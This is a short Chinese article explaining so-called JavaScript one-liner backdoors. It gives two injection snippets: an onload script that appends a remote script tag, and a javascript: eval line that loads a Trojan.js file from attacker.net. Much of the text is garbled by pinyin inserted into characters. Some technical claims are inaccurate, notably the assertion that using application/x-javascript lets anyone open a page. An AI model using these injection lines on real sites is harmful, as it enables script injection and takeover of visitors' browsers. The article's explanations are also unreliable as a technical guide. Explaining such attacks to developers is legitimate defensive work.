JavaScript一句話后門（JavaScript One-Liner)是指一種危險(xiǎn)的惡意程序代碼，它通常只有一行JavaScript代碼，通過(guò)利用Web頁(yè)面的漏洞，允許攻擊者遠(yuǎn)程執(zhí)行惡意操作。使用JavaScript一句話后門，攻擊者可以竊取用戶敏感信息、破壞網(wǎng)站功能或者將受害者設(shè)備使用為自己的僵尸網(wǎng)絡(luò)。就像Python反彈Shell一樣，JavaScript一句話后門也屬于Web安全領(lǐng)域廣泛使用的技巧之一。

示例1：代碼注入一個(gè)JS一句話后門

window.onload=function(){
var s=document.createElement('script');
s.type='text/javascript';
s.src='http://www.baidu.com/jquery.min.js?'+Math.random();
document.body.appendChild(s);
}

該示例中，當(dāng)頁(yè)面加載完畢后，將注入新的JavaScript文件，這個(gè)文件中包含有使用jquery的一段惡意代碼。由于代碼通常使用好看且不容易引起懷疑的名字命名，并且在每次運(yùn)行時(shí)運(yùn)用了隨機(jī)數(shù)，從而增加它的追蹤難度。

示例2：攻擊者通過(guò)URL注入一段JS一句話后門

javascript:eval('var s=document.createElement("script");s.type="text/javascript";s.src="http://attacker.net/Trojan.js?'+Math.random()+'";document.body.appendChild(s);');

這個(gè)示例是利用JavaScript中的偽協(xié)議來(lái)匿名注入一段JS代碼，通過(guò)它，攻擊者可在不經(jīng)過(guò)用戶同意的情況下獲得對(duì)用戶設(shè)備的控制權(quán)。這也解釋了為什么別人給你發(fā)送的一些奇怪的點(diǎn)擊鏈接，你就會(huì)感到害怕的原因。

在這里我想特別提醒一下網(wǎng)站開(kāi)發(fā)者在開(kāi)發(fā)過(guò)程中不要隨意使用application/x-javascript，在特定的環(huán)境中是允許通過(guò)訪問(wèn)控制讓世界上任何人都可以打開(kāi)你的頁(yè)面的！

總之，JavaScript一句話后門是一種危險(xiǎn)的Web攻擊技巧。網(wǎng)站開(kāi)發(fā)者必須始終保持警覺(jué)，采取各種安全措施來(lái)保護(hù)自己的站點(diǎn)和用戶。從使用外部開(kāi)源庫(kù)到防御跨站腳本攻擊，所有這些安全措施都至關(guān)重要。